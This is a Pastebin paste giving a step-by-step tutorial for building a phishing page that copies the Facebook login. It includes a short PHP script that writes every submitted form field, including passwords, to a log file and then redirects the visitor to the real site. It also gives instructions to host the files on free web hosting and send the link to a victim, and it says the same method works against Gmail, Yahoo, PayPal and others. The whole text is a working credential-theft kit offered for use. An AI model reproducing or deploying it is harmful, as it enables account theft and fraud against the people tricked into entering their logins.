indongsaeng

Phishing

Jul 9th, 2013
310
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.56 KB | None | 0 0
  1. . First Open the website of which you want to make phisher/ fake login page Eg : Facebook.com
  2.  
  3. 2. Now do right click and save the page source.
  4.  
  5. 3. Open the page in notepad, Now search for "action = " and change following address to login.php.
  6.  
  7.  
  8.  
  9.  
  10. 4. After editing save the page as "index.html"
  11. 5. Now its time to create login.php . Open notepad and copy/paste this below code and save it as login.php :
  12.  
  13. header ('Location: http://facebook.com/login.php');
  14. $handle = fopen("log.txt", "a");
  15. foreach($_POST as $variable => $value) {
  16. fwrite($handle, $variable);
  17. fwrite($handle, "=");
  18. fwrite($handle, $value);
  19. fwrite($handle, "\r\n");
  20. }
  21. fwrite($handle, "\r\n");
  22. fclose($handle);
  23. exit;
  24. ?>
  25.  
  26. 6. Now create a simple and empty text file in notepad and save it as log.txt
  27. 7. Now create your own free web hosting account at my3gb.com and upload all the three files.(You can use any FREE web hosting site)
  28. 8. Upload Index.html , login.php , log.txt we created in above steps...
  29. 9. We are done, our phisher / fake login page is ready.
  30.  
  31. How to Hack Accounts ?
  32.  
  33. Send the index.html (the uploaded my3gb.com ) link to the victim , once he/she will enter the information and do login with our fake login page then every thing will be stored in log.txt, we can now open log.txt to see all the Login details
  34. Its very simple to create phisher of any website in the world, Here i have taken the example of Facebook Phisher . But in this same you can also create the phisher of many websites like yahoo, gmail, orkut, msn, paypal etc.
Add Comment
Please, Sign In to add comment